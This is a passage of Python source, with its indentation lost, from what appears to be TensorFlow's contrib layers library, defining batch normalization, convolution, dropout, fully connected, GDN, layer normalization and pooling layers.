outputs = layer.apply(inputs, training=is_training)
_add_variable_to_collections(
layer.moving_mean, variables_collections, 'moving_mean')
_add_variable_to_collections(
layer.moving_variance, variables_collections, 'moving_variance')
if layer.beta is not None:
_add_variable_to_collections(layer.beta, variables_collections, 'beta')
if layer.gamma is not None:
_add_variable_to_collections(
layer.gamma, variables_collections, 'gamma')
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
if renorm:
raise ValueError('renorm is not supported with batch_weights, '
'updates_collections or zero_debias_moving_mean')
inputs_shape = inputs.get_shape()
inputs_rank = inputs_shape.ndims
if inputs_rank is None:
raise ValueError('Inputs %s has undefined rank.' % inputs.name)
dtype = inputs.dtype.base_dtype
if batch_weights is not None:
batch_weights = ops.convert_to_tensor(batch_weights)
inputs_shape[0:1].assert_is_compatible_with(batch_weights.get_shape())
nshape = [-1] + [1 for _ in range(inputs_rank - 1)]
batch_weights = array_ops.reshape(batch_weights, nshape)
if data_format == DATA_FORMAT_NCHW:
moments_axes = [0] + list(range(2, inputs_rank))
params_shape = inputs_shape[1:2]
params_shape_broadcast = list(
[1, inputs_shape[1].value] + [1 for _ in range(2, inputs_rank)])
else:
moments_axes = list(range(inputs_rank - 1))
params_shape = inputs_shape[-1:]
params_shape_broadcast = None
if not params_shape.is_fully_defined():
raise ValueError('Inputs %s has undefined channels dimension %s.' % (
inputs.name, params_shape))
beta, gamma = None, None
if not param_initializers:
param_initializers = {}
if center:
beta_collections = utils.get_variable_collections(variables_collections,
'beta')
beta_initializer = param_initializers.get('beta',
init_ops.zeros_initializer())
beta = variables.model_variable('beta',
shape=params_shape,
dtype=dtype,
initializer=beta_initializer,
collections=beta_collections,
trainable=trainable)
if scale:
gamma_collections = utils.get_variable_collections(variables_collections,
'gamma')
gamma_initializer = param_initializers.get('gamma',
init_ops.ones_initializer())
gamma = variables.model_variable('gamma',
shape=params_shape,
dtype=dtype,
initializer=gamma_initializer,
collections=gamma_collections,
trainable=trainable)
partitioner = variable_scope.get_variable_scope().partitioner
try:
variable_scope.get_variable_scope().set_partitioner(None)
moving_mean_collections = utils.get_variable_collections(
variables_collections, 'moving_mean')
moving_mean_initializer = param_initializers.get(
'moving_mean', init_ops.zeros_initializer())
moving_mean = variables.model_variable(
'moving_mean',
shape=params_shape,
dtype=dtype,
initializer=moving_mean_initializer,
trainable=False,
collections=moving_mean_collections)
moving_variance_collections = utils.get_variable_collections(
variables_collections, 'moving_variance')
moving_variance_initializer = param_initializers.get(
'moving_variance', init_ops.ones_initializer())
moving_variance = variables.model_variable(
'moving_variance',
shape=params_shape,
dtype=dtype,
initializer=moving_variance_initializer,
trainable=False,
collections=moving_variance_collections)
finally:
variable_scope.get_variable_scope().set_partitioner(partitioner)
# a `Variable` or `Placeholder` then is_training_value will be None and
# `needs_moments` will be true.
is_training_value = utils.constant_value(is_training)
need_moments = is_training_value is None or is_training_value
if need_moments:
# Calculate the moments based on the individual batch.
if batch_weights is None:
if data_format == DATA_FORMAT_NCHW:
mean, variance = nn.moments(inputs, moments_axes, keep_dims=True)
mean = array_ops.reshape(mean, [-1])
variance = array_ops.reshape(variance, [-1])
else:
mean, variance = nn.moments(inputs, moments_axes)
else:
if data_format == DATA_FORMAT_NCHW:
mean, variance = nn.weighted_moments(inputs, moments_axes,
batch_weights, keep_dims=True)
mean = array_ops.reshape(mean, [-1])
variance = array_ops.reshape(variance, [-1])
else:
mean, variance = nn.weighted_moments(inputs, moments_axes,
batch_weights)
moving_vars_fn = lambda: (moving_mean, moving_variance)
if updates_collections is None:
def _force_updates():
update_moving_mean = moving_averages.assign_moving_average(
moving_mean, mean, decay, zero_debias=zero_debias_moving_mean)
update_moving_variance = moving_averages.assign_moving_average(
moving_variance, variance, decay, zero_debias=False)
with ops.control_dependencies([update_moving_mean,
update_moving_variance]):
return array_ops.identity(mean), array_ops.identity(variance)
mean, variance = utils.smart_cond(is_training,
_force_updates,
moving_vars_fn)
else:
def _delay_updates():
"""Internal function that delay updates moving_vars if is_training."""
update_moving_mean = moving_averages.assign_moving_average(
moving_mean, mean, decay, zero_debias=zero_debias_moving_mean)
update_moving_variance = moving_averages.assign_moving_average(
moving_variance, variance, decay, zero_debias=False)
return update_moving_mean, update_moving_variance
update_mean, update_variance = utils.smart_cond(is_training,
_delay_updates,
moving_vars_fn)
ops.add_to_collections(updates_collections, update_mean)
ops.add_to_collections(updates_collections, update_variance)
# Use computed moments during training and moving_vars otherwise.
vars_fn = lambda: (mean, variance)
mean, variance = utils.smart_cond(is_training, vars_fn, moving_vars_fn)
else:
mean, variance = moving_mean, moving_variance
if data_format == DATA_FORMAT_NCHW:
mean = array_ops.reshape(mean, params_shape_broadcast)
variance = array_ops.reshape(variance, params_shape_broadcast)
if beta is not None:
beta = array_ops.reshape(beta, params_shape_broadcast)
if gamma is not None:
gamma = array_ops.reshape(gamma, params_shape_broadcast)
# Compute batch_normalization.
outputs = nn.batch_normalization(inputs, mean, variance, beta, gamma,
epsilon)
outputs.set_shape(inputs_shape)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
@add_arg_scope
def bias_add(inputs,
activation_fn=None,
initializer=init_ops.zeros_initializer(),
regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
data_format=DATA_FORMAT_NHWC,
scope=None):
if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
raise ValueError('data_format has to be either NCHW or NHWC.')
with variable_scope.variable_scope(scope, 'BiasAdd', [inputs],
reuse=reuse) as sc:
inputs = ops.convert_to_tensor(inputs)
dtype = inputs.dtype.base_dtype
inputs_shape = inputs.get_shape()
inputs_rank = inputs_shape.ndims
if inputs_rank is None:
raise ValueError('Dims of shape must be known but is None')
elif inputs_rank != 4 and data_format == DATA_FORMAT_NCHW:
raise ValueError('Data format NCHW only supports 4D Tensor')
axis = 1 if data_format == DATA_FORMAT_NCHW else -1
num_features = inputs_shape[axis].value
if num_features is None:
raise ValueError('`C` dimension must be known but is None')
biases_collections = utils.get_variable_collections(variables_collections,
'biases')
biases = variables.model_variable('biases',
shape=[num_features,],
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
collections=biases_collections,
trainable=trainable)
outputs = nn.bias_add(inputs, biases, data_format=data_format)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
# TODO(jbms): change `rate` parameter to `dilation_rate` for consistency with
# underlying op.
@add_arg_scope
def convolution(inputs,
num_outputs,
kernel_size,
stride=1,
padding='SAME',
data_format=None,
rate=1,
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer(),
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
if data_format not in [None, 'NWC', 'NCW', 'NHWC', 'NCHW', 'NDHWC', 'NCDHW']:
raise ValueError('Invalid data_format: %r' % (data_format,))
layer_variable_getter = _build_variable_getter(
{'bias': 'biases', 'kernel': 'weights'})
with variable_scope.variable_scope(
scope, 'Conv', [inputs], reuse=reuse,
custom_getter=layer_variable_getter) as sc:
inputs = ops.convert_to_tensor(inputs)
input_rank = inputs.get_shape().ndims
if input_rank == 3:
layer_class = convolutional_layers.Convolution1D
elif input_rank == 4:
layer_class = convolutional_layers.Convolution2D
elif input_rank == 5:
layer_class = convolutional_layers.Convolution3D
else:
raise ValueError('Convolution not supported for input with rank',
input_rank)
df = ('channels_first' if data_format and data_format.startswith('NC')
else 'channels_last')
layer = layer_class(filters=num_outputs,
kernel_size=kernel_size,
strides=stride,
padding=padding,
data_format=df,
dilation_rate=rate,
activation=None,
use_bias=not normalizer_fn and biases_initializer,
kernel_initializer=weights_initializer,
bias_initializer=biases_initializer,
kernel_regularizer=weights_regularizer,
bias_regularizer=biases_regularizer,
activity_regularizer=None,
trainable=trainable,
name=sc.name,
dtype=inputs.dtype.base_dtype,
_scope=sc,
_reuse=reuse)
outputs = layer.apply(inputs)
# Add variables to collections.
_add_variable_to_collections(layer.kernel, variables_collections, 'weights')
if layer.use_bias:
_add_variable_to_collections(layer.bias, variables_collections, 'biases')
if normalizer_fn is not None:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
convolution2d = convolution
convolution3d = convolution
@add_arg_scope
def convolution2d_in_plane(
inputs,
kernel_size,
stride=1,
padding='SAME',
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer(),
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
with variable_scope.variable_scope(
scope, 'ConvInPlane', [inputs], reuse=reuse) as sc:
dtype = inputs.dtype.base_dtype
kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
stride_h, stride_w = utils.two_element_tuple(stride)
num_filters_in = utils.last_dimension(inputs.get_shape(), min_rank=4)
weights_shape = [kernel_h, kernel_w, 1, 1]
weights_collections = utils.get_variable_collections(
variables_collections, 'weights')
weights = variables.model_variable('weights',
shape=weights_shape,
dtype=dtype,
initializer=weights_initializer,
regularizer=weights_regularizer,
collections=weights_collections,
trainable=trainable)
depthwise_weights = array_ops.tile(weights, [1, 1, num_filters_in, 1])
outputs = nn.depthwise_conv2d(inputs, depthwise_weights,
[1, stride_h, stride_w, 1], padding)
if normalizer_fn is not None:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
else:
if biases_initializer is not None:
biases_collections = utils.get_variable_collections(
variables_collections, 'biases')
biases = variables.model_variable('biases',
shape=[num_filters_in,],
dtype=dtype,
initializer=biases_initializer,
regularizer=biases_regularizer,
collections=biases_collections,
trainable=trainable)
outputs = nn.bias_add(outputs, biases)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
@add_arg_scope
def convolution2d_transpose(
inputs,
num_outputs,
kernel_size,
stride=1,
padding='SAME',
data_format=DATA_FORMAT_NHWC,
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer(),
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
layer_variable_getter = _build_variable_getter(
{'bias': 'biases', 'kernel': 'weights'})
with variable_scope.variable_scope(
scope, 'Conv2d_transpose', [inputs], reuse=reuse,
custom_getter=layer_variable_getter) as sc:
if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
raise ValueError('data_format has to be either NCHW or NHWC.')
inputs = ops.convert_to_tensor(inputs)
df = ('channels_first' if data_format and data_format.startswith('NC')
else 'channels_last')
layer = convolutional_layers.Convolution2DTranspose(
filters=num_outputs,
kernel_size=kernel_size,
strides=stride,
padding=padding,
data_format=df,
activation=None,
use_bias=not normalizer_fn and biases_initializer,
kernel_initializer=weights_initializer,
bias_initializer=biases_initializer,
kernel_regularizer=weights_regularizer,
bias_regularizer=biases_regularizer,
activity_regularizer=None,
trainable=trainable,
name=sc.name,
dtype=inputs.dtype.base_dtype,
_scope=sc,
_reuse=reuse)
outputs = layer.apply(inputs)
# Add variables to collections.
_add_variable_to_collections(layer.kernel, variables_collections, 'weights')
if layer.bias:
_add_variable_to_collections(layer.bias, variables_collections, 'biases')
if normalizer_fn is not None:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
@add_arg_scope
def convolution3d_transpose(
inputs,
num_outputs,
kernel_size,
stride=1,
padding='SAME',
data_format=DATA_FORMAT_NDHWC,
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer(),
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
layer_variable_getter = _build_variable_getter(
{'bias': 'biases', 'kernel': 'weights'})
with variable_scope.variable_scope(
scope, 'Conv3d_transpose', [inputs], reuse=reuse,
custom_getter=layer_variable_getter) as sc:
if data_format not in (DATA_FORMAT_NCDHW, DATA_FORMAT_NDHWC):
raise ValueError('data_format has to be either NCDHW or NDHWC.')
inputs = ops.convert_to_tensor(inputs)
df = ('channels_first' if data_format and data_format.startswith('NC')
else 'channels_last')
layer = convolutional_layers.Convolution3DTranspose(
filters=num_outputs,
kernel_size=kernel_size,
strides=stride,
padding=padding,
data_format=df,
activation=None,
use_bias=not normalizer_fn and biases_initializer,
kernel_initializer=weights_initializer,
bias_initializer=biases_initializer,
kernel_regularizer=weights_regularizer,
bias_regularizer=biases_regularizer,
activity_regularizer=None,
trainable=trainable,
name=sc.name,
dtype=inputs.dtype.base_dtype,
_scope=sc,
_reuse=reuse)
outputs = layer.apply(inputs)
# Add variables to collections.
_add_variable_to_collections(layer.kernel, variables_collections, 'weights')
if layer.bias:
_add_variable_to_collections(layer.bias, variables_collections, 'biases')
if normalizer_fn is not None:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
@add_arg_scope
def dropout(inputs,
keep_prob=0.5,
noise_shape=None,
is_training=True,
outputs_collections=None,
scope=None):
with variable_scope.variable_scope(
scope, 'Dropout', [inputs], custom_getter=_model_variable_getter) as sc:
inputs = ops.convert_to_tensor(inputs)
layer = core_layers.Dropout(rate=1 - keep_prob,
noise_shape=noise_shape,
name=sc.name,
_scope=sc)
outputs = layer.apply(inputs, training=is_training)
return utils.collect_named_outputs(
outputs_collections, sc.original_name_scope, outputs)
@add_arg_scope
def flatten(inputs,
outputs_collections=None,
scope=None):
with ops.name_scope(scope, 'Flatten', [inputs]) as sc:
inputs = ops.convert_to_tensor(inputs)
inputs_rank = inputs.get_shape().ndims
if (inputs_rank is None) or (inputs_rank < 2):
raise ValueError('Inputs must have a least 2 dimensions.')
inputs_shape = array_ops.shape(inputs)
batch_dim = array_ops.slice(inputs_shape, [0], [1])
spatial_dims = array_ops.slice(inputs_shape, [1], [inputs_rank - 1])
flat_spatial_dim = math_ops.reduce_prod(spatial_dims)
flat_spatial_dim = array_ops.expand_dims(flat_spatial_dim, 0)
flat_shape = array_ops.concat([batch_dim, flat_spatial_dim], 0)
outputs = array_ops.reshape(inputs, flat_shape)
# Attempt to propagate shape information, if it is defined.
input_shape = inputs.get_shape().as_list()
batch_dim, spatial_dims = input_shape[0], input_shape[1:]
if all(spatial_dims):
outputs.set_shape([batch_dim,
functools.reduce(lambda x, y: x * y, spatial_dims)])
else:
outputs.set_shape([batch_dim, None])
return utils.collect_named_outputs(outputs_collections, sc, outputs)
def _sparse_inner_flatten(inputs, new_rank):
inputs_rank = inputs.dense_shape.get_shape().as_list()[0]
if inputs_rank < new_rank:
raise ValueError(
'Inputs has rank less than new_rank. {} must have rank at least'
' {}. Received rank {}, shape {}'.format(inputs, new_rank, inputs_rank,
inputs.get_shape()))
outer_dimensions = inputs.dense_shape[:new_rank - 1]
inner_dimensions = inputs.dense_shape[new_rank - 1:]
new_shape = array_ops.concat((outer_dimensions,
[math_ops.reduce_prod(inner_dimensions)]), 0)
flattened = sparse_ops.sparse_reshape(inputs, new_shape)
return flattened
def _dense_inner_flatten(inputs, new_rank):
rank_assertion = check_ops.assert_rank_at_least(
inputs, new_rank, message='inputs has rank less than new_rank')
with ops.control_dependencies([rank_assertion]):
outer_dimensions = array_ops.strided_slice(
array_ops.shape(inputs), [0], [new_rank - 1])
new_shape = array_ops.concat((outer_dimensions, [-1]), 0)
reshaped = array_ops.reshape(inputs, new_shape)
# if `new_rank` is an integer, try to calculate new shape.
if isinstance(new_rank, six.integer_types):
static_shape = inputs.get_shape()
if static_shape is not None and static_shape.dims is not None:
static_shape = static_shape.as_list()
static_outer_dims = static_shape[:new_rank - 1]
static_inner_dims = static_shape[new_rank - 1:]
flattened_dimension = 1
for inner_dim in static_inner_dims:
if inner_dim is None:
flattened_dimension = None
break
flattened_dimension *= inner_dim
reshaped.set_shape(static_outer_dims + [flattened_dimension])
return reshaped
@add_arg_scope
def _inner_flatten(inputs, new_rank, output_collections=None, scope=None):
with ops.name_scope(scope, 'InnerFlatten', [inputs, new_rank]) as sc:
if isinstance(inputs, sparse_tensor.SparseTensor):
flattened = _sparse_inner_flatten(inputs, new_rank)
else:
inputs = ops.convert_to_tensor(inputs)
flattened = _dense_inner_flatten(inputs, new_rank)
return utils.collect_named_outputs(output_collections, sc, flattened)
def _model_variable_getter(getter, name, shape=None, dtype=None,
initializer=None, regularizer=None, trainable=True,
collections=None, caching_device=None,
partitioner=None, rename=None, use_resource=None,
**_):
short_name = name.split('/')[-1]
if rename and short_name in rename:
name_components = name.split('/')
name_components[-1] = rename[short_name]
name = '/'.join(name_components)
return variables.model_variable(
name, shape=shape, dtype=dtype, initializer=initializer,
regularizer=regularizer, collections=collections, trainable=trainable,
caching_device=caching_device, partitioner=partitioner,
custom_getter=getter, use_resource=use_resource)
def _build_variable_getter(rename=None):
# VariableScope will nest the getters
def layer_variable_getter(getter, *args, **kwargs):
kwargs['rename'] = rename
return _model_variable_getter(getter, *args, **kwargs)
return layer_variable_getter
def _add_variable_to_collections(variable, collections_set, collections_name):
collections = utils.get_variable_collections(
collections_set, collections_name) or []
variables_list = [variable]
if isinstance(variable, tf_variables.PartitionedVariable):
variables_list = [v for v in variable]
for collection in collections:
for var in variables_list:
if var not in ops.get_collection(collection):
ops.add_to_collection(collection, var)
@add_arg_scope
def fully_connected(inputs,
num_outputs,
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer(),
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
if not isinstance(num_outputs, six.integer_types):
raise ValueError(
'num_outputs should be int or long, got %s.' % (num_outputs,))
layer_variable_getter = _build_variable_getter({'bias': 'biases',
'kernel': 'weights'})
with variable_scope.variable_scope(
scope, 'fully_connected', [inputs],
reuse=reuse, custom_getter=layer_variable_getter) as sc:
inputs = ops.convert_to_tensor(inputs)
layer = core_layers.Dense(
units=num_outputs,
activation=None,
use_bias=not normalizer_fn and biases_initializer,
kernel_initializer=weights_initializer,
bias_initializer=biases_initializer,
kernel_regularizer=weights_regularizer,
bias_regularizer=biases_regularizer,
activity_regularizer=None,
trainable=trainable,
name=sc.name,
dtype=inputs.dtype.base_dtype,
_scope=sc,
_reuse=reuse)
outputs = layer.apply(inputs)
# Add variables to collections.
_add_variable_to_collections(layer.kernel, variables_collections, 'weights')
if layer.bias is not None:
_add_variable_to_collections(layer.bias, variables_collections, 'biases')
# Apply normalizer function / layer.
if normalizer_fn is not None:
if not normalizer_params:
normalizer_params = {}
outputs = normalizer_fn(outputs, **normalizer_params)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(
outputs_collections, sc.original_name_scope, outputs)
class GDN(base.Layer):
def __init__(self,
inverse=False,
beta_min=1e-6,
gamma_init=.1,
reparam_offset=2 ** -18,
data_format='channels_last',
activity_regularizer=None,
trainable=True,
name=None,
**kwargs):
super(GDN, self).__init__(trainable=trainable, name=name, **kwargs)
self.inverse = inverse
self._beta_min = beta_min
self._gamma_init = gamma_init
self._reparam_offset = reparam_offset
self.data_format = data_format
self.activity_regularizer = activity_regularizer
self._channel_axis() # trigger ValueError early
self.input_spec = base.InputSpec(min_ndim=3, max_ndim=5)
def _channel_axis(self):
try:
return {'channels_first': 1, 'channels_last': -1}[self.data_format]
except KeyError:
raise ValueError('Unsupported `data_format` for GDN layer: {}.'.format(
self.data_format))
@staticmethod
def _lower_bound(inputs, bound, name=None):
with ops.name_scope(name, 'GDNLowerBound', [inputs, bound]) as scope:
inputs = ops.convert_to_tensor(inputs, name='inputs')
bound = ops.convert_to_tensor(bound, name='bound')
with ops.get_default_graph().gradient_override_map(
{'Maximum': 'GDNLowerBound'}):
return math_ops.maximum(inputs, bound, name=scope)
@staticmethod
def _lower_bound_grad(op, grad):
inputs = op.inputs[0]
bound = op.inputs[1]
pass_through_if = math_ops.logical_or(inputs >= bound, grad < 0)
return [math_ops.cast(pass_through_if, grad.dtype) * grad, None]
def build(self, input_shape):
channel_axis = self._channel_axis()
input_shape = tensor_shape.TensorShape(input_shape)
num_channels = input_shape[channel_axis].value
if num_channels is None:
raise ValueError('The channel dimension of the inputs to `GDN` '
'must be defined.')
self._input_rank = input_shape.ndims
self.input_spec = base.InputSpec(ndim=input_shape.ndims,
axes={channel_axis: num_channels})
pedestal = array_ops.constant(self._reparam_offset ** 2, dtype=self.dtype)
beta_bound = array_ops.constant(
(self._beta_min + self._reparam_offset ** 2) ** .5, dtype=self.dtype)
gamma_bound = array_ops.constant(self._reparam_offset, dtype=self.dtype)
def beta_initializer(shape, dtype=None, partition_info=None):
del partition_info # unused
return math_ops.sqrt(array_ops.ones(shape, dtype=dtype) + pedestal)
def gamma_initializer(shape, dtype=None, partition_info=None):
del partition_info # unused
assert len(shape) == 2
assert shape[0] == shape[1]
eye = linalg_ops.eye(shape[0], dtype=dtype)
return math_ops.sqrt(self._gamma_init * eye + pedestal)
beta = self.add_variable('reparam_beta',
shape=[num_channels],
initializer=beta_initializer,
dtype=self.dtype,
trainable=True)
beta = self._lower_bound(beta, beta_bound)
self.beta = math_ops.square(beta) - pedestal
gamma = self.add_variable('reparam_gamma',
shape=[num_channels, num_channels],
initializer=gamma_initializer,
dtype=self.dtype,
trainable=True)
gamma = self._lower_bound(gamma, gamma_bound)
self.gamma = math_ops.square(gamma) - pedestal
self.built = True
def call(self, inputs):
inputs = ops.convert_to_tensor(inputs, dtype=self.dtype)
ndim = self._input_rank
shape = self.gamma.get_shape().as_list()
gamma = array_ops.reshape(self.gamma, (ndim - 2) * [1] + shape)
# Compute normalization pool.
if self.data_format == 'channels_first':
norm_pool = nn.convolution(math_ops.square(inputs), gamma, 'VALID',
data_format='NC' + 'DHW'[-(ndim - 2):])
if ndim == 3:
norm_pool = array_ops.expand_dims(norm_pool, 2)
norm_pool = nn.bias_add(norm_pool, self.beta, data_format='NCHW')
norm_pool = array_ops.squeeze(norm_pool, [2])
elif ndim == 5:
shape = array_ops.shape(norm_pool)
norm_pool = array_ops.reshape(norm_pool, shape[:3] + [-1])
norm_pool = nn.bias_add(norm_pool, self.beta, data_format='NCHW')
norm_pool = array_ops.reshape(norm_pool, shape)
else: # ndim == 4
norm_pool = nn.bias_add(norm_pool, self.beta, data_format='NCHW')
else: # channels_last
norm_pool = nn.convolution(math_ops.square(inputs), gamma, 'VALID')
norm_pool = nn.bias_add(norm_pool, self.beta, data_format='NHWC')
norm_pool = math_ops.sqrt(norm_pool)
if self.inverse:
outputs = inputs * norm_pool
else:
outputs = inputs / norm_pool
outputs.set_shape(inputs.get_shape())
return outputs
def _compute_output_shape(self, input_shape):
channel_axis = self._channel_axis()
input_shape = tensor_shape.TensorShape(input_shape)
if not 3 <= input_shape.ndim <= 5:
raise ValueError('`input_shape` must be of rank 3 to 5, inclusive.')
if input_shape[channel_axis].value is None:
raise ValueError(
'The channel dimension of `input_shape` must be defined.')
return input_shape
ops.RegisterGradient('GDNLowerBound')(GDN._lower_bound_grad) # pylint:disable=protected-access
def gdn(inputs,
inverse=False,
beta_min=1e-6,
gamma_init=.1,
reparam_offset=2 ** -18,
data_format='channels_last',
activity_regularizer=None,
trainable=True,
name=None,
reuse=None):
layer = GDN(inverse=inverse,
beta_min=beta_min,
gamma_init=gamma_init,
reparam_offset=reparam_offset,
data_format=data_format,
activity_regularizer=activity_regularizer,
trainable=trainable,
name=name,
dtype=inputs.dtype.base_dtype,
_scope=name,
_reuse=reuse)
return layer.apply(inputs)
@add_arg_scope
def layer_norm(inputs,
center=True,
scale=True,
activation_fn=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
begin_norm_axis=1,
begin_params_axis=-1,
scope=None):
with variable_scope.variable_scope(scope, 'LayerNorm', [inputs],
reuse=reuse) as sc:
inputs = ops.convert_to_tensor(inputs)
inputs_shape = inputs.shape
inputs_rank = inputs_shape.ndims
if inputs_rank is None:
raise ValueError('Inputs %s has undefined rank.' % inputs.name)
dtype = inputs.dtype.base_dtype
if begin_norm_axis < 0:
begin_norm_axis = inputs_rank + begin_norm_axis
if begin_params_axis >= inputs_rank or begin_norm_axis >= inputs_rank:
raise ValueError(
'begin_params_axis (%d) and begin_norm_axis (%d) '
'must be < rank(inputs) (%d)'
% (begin_params_axis, begin_norm_axis, inputs_rank))
params_shape = inputs_shape[begin_params_axis:]
if not params_shape.is_fully_defined():
raise ValueError(
'Inputs %s: shape(inputs)[%s:] is not fully defined: %s' % (
inputs.name, begin_params_axis, inputs_shape))
# Allocate parameters for the beta and gamma of the normalization.
beta, gamma = None, None
if center:
beta_collections = utils.get_variable_collections(variables_collections,
'beta')
beta = variables.model_variable(
'beta',
shape=params_shape,
dtype=dtype,
initializer=init_ops.zeros_initializer(),
collections=beta_collections,
trainable=trainable)
if scale:
gamma_collections = utils.get_variable_collections(variables_collections,
'gamma')
gamma = variables.model_variable(
'gamma',
shape=params_shape,
dtype=dtype,
initializer=init_ops.ones_initializer(),
collections=gamma_collections,
trainable=trainable)
# Calculate the moments on the last axis (layer activations).
norm_axes = list(range(begin_norm_axis, inputs_rank))
mean, variance = nn.moments(inputs, norm_axes, keep_dims=True)
# Compute layer normalization using the batch_normalization function.
variance_epsilon = 1e-12
outputs = nn.batch_normalization(
inputs, mean, variance, offset=beta, scale=gamma,
variance_epsilon=variance_epsilon)
outputs.set_shape(inputs_shape)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope,
outputs)
@add_arg_scope
def max_pool2d(inputs,
kernel_size,
stride=2,
padding='VALID',
data_format=DATA_FORMAT_NHWC,
outputs_collections=None,
scope=None):
if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
raise ValueError('data_format has to be either NCHW or NHWC.')
with ops.name_scope(scope, 'MaxPool2D', [inputs]) as sc:
inputs = ops.convert_to_tensor(inputs)
df = ('channels_first' if data_format and data_format.startswith('NC')
else 'channels_last')
layer = pooling_layers.MaxPooling2D(pool_size=kernel_size,
strides=stride,
padding=padding,
data_format=df,
_scope=sc)
outputs = layer.apply(inputs)
return utils.collect_named_outputs(outputs_collections, sc, outputs)
@add_arg_scope
def max_pool3d(inputs,
kernel_size,
stride=2,
padding='VALID',
data_format=DATA_FORMAT_NDHWC,
outputs_collections=None,
scope=None):
if data_format not in (DATA_FORMAT_NCDHW, DATA_FORMAT_NDHWC):
raise ValueError('data_format has to be either NCDHW or NDHWC.')
with ops.name_scope(scope, 'MaxPool3D', [inputs]) as sc:
inputs = ops.convert_to_tensor(inputs)
df = ('channels_first' if data_format and data_format.startswith('NC')
else 'channels_last')
layer = pooling_layers.MaxPooling3D(pool_size=kernel_size,
strides=stride,
padding=padding,
data_format=df,
_scope=sc)
outputs = layer.apply(inputs)
return utils.collect_named_outputs(outputs_collections, sc, outputs)
@add_arg_scope
def pool(inputs,
kernel_size,
pooling_type,
padding='VALID',
data_format=None,
dilation_rate=1,
stride=1,
outputs_collections=None,
scope=None):
# pylint: disable=line-too-long
# pylint: enable=line-too-long
with ops.name_scope(scope, '%s_pool' %
(pooling_type.lower()), [inputs]) as sc:
inputs = ops.convert_to_tensor(inputs)
input_rank = inputs.get_shape().ndims
if input_rank is None:
raise ValueError('Rank of inputs must be known')
if input_rank < 3:
raise ValueError('Rank of inputs must be >= 3')
num_spatial_dims = input_rank - 2
output = nn.pool(
input=inputs,
window_shape=utils.n_positive_integers(num_spatial_dims, kernel_size),
pooling_type=pooling_type,
padding=padding,
data_format=data_format,
dilation_rate=utils.n_positive_integers(num_spatial_dims,
dilation_rate),
strides=utils.n_positive_integers(num_spatial_dims, stride),
name=sc)
return utils.collect_named_outputs(outputs_collections, sc, output)
@add_arg_scope
def one_hot_encoding(labels,
num_classes,
on_value=1.0,
off_value=0.0,
outputs_collections=None,
scope=None):
with ops.name_scope(scope, 'OneHotEncoding', [labels, num_classes]) as sc:
labels = ops.convert_to_tensor(labels)
if labels.dtype == dtypes.int32:
labels = standard_ops.to_int64(labels)
outputs = standard_ops.one_hot(labels,
num_classes,
on_value=on_value,
off_value=off_value)
return utils.collect_named_outputs(outputs_collections, sc, outputs)
def _apply_activation(y, activation_fn, output_collections):
if activation_fn is not None:
y = activation_fn(y)
ops.add_to_collections(list(output_collections or []) +
[ops.GraphKeys.ACTIVATIONS], y)
return y
def repeat(inputs, repetitions, layer, *args, **kwargs):
scope = kwargs.pop('scope', None)
with variable_scope.variable_scope(scope, 'Repeat', [inputs]):
inputs = ops.convert_to_tensor(inputs)
if scope is None:
if hasattr(layer, '__name__'):
scope = layer.__name__
elif hasattr(layer, 'func') and hasattr(layer.func, '__name__'):
scope = layer.func.__name__ # In case layer is a functools.partial.
else:
scope = 'repeat'
outputs = inputs
for i in range(repetitions):
kwargs['scope'] = scope + '_' + str(i+1)
outputs = layer(outputs, *args, **kwargs)
return outputs
def _scale_gradient_shape(op):
